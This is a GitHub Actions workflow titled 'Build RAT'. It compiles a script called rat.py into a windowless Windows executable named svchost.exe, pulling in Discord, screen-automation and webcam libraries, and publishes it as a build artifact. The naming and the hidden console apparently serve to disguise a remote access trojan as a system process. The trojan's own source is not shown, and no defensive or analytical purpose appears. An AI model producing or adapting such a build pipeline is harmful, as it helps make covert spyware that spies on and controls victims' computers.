name: Build RAT
on: [push]

jobs:
  build:
    runs-on: windows-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
        with:
          python-version: '3.11'
      
      - name: Install
        run: |
          pip install pyinstaller discord.py pyautogui opencv-python
      
      - name: Compile
        run: |
          pyinstaller --onefile --noconsole --name svchost rat.py
      
      - uses: actions/upload-artifact@v4
        with:
          name: svchost
          path: dist/svchost.exe
